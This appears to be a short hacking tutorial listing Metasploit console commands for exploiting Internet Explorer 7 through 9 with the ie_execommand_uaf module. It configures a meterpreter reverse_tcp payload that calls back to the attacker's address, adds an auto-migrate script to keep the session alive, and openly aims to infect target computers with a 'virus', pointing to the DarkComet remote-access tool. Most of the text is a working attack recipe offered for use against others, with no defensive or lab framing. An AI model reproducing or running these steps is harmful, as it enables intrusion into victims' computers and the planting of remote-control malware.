In this article we will share the process to exploit an Internet explorer 7, 8 or 9. This exploit will allow you to patch the target computers with virus.
What you need:
- A server or virus to send to the target. Refer to the DarkComet tutorial for an example of how to make one.
- Metasploit (comes with BackTrack. Setup instructions for setting this up can be found in this app.)
Steps to exploit:
- Start up msfconsole, and enter the following commands: use exploit/windows/browser/ie_execommand_uaf
- set PAYLOAD windows/meterpreter/reverse_tcp (can be arbitrary, type show payloads to see what you want)
- The next 2 commands are only required for reverse payloads, and may be skipped.
- set LHOST 0.0.0.0 (Your IP address)
- set LPORT 443 (can be arbitrary)
- set SRVHOST 0.0.0.0 (can be arbitrary IP to host server, if you have bind access. Otherwise use yourself.)
- set SRVPORT 80 (for direct HTTP, can be changed)
- set URIPATH / (can be arbitrary, is basically the path after your ip [e.g 0.0.0.0/mypath can be just / if they connect directly])
- set AutoRunScript migrate -f (use for meterpreter to move from browser process which can be closed)
- exploit (runs your server)
Follow these steps carefully and you can easily exploit IE.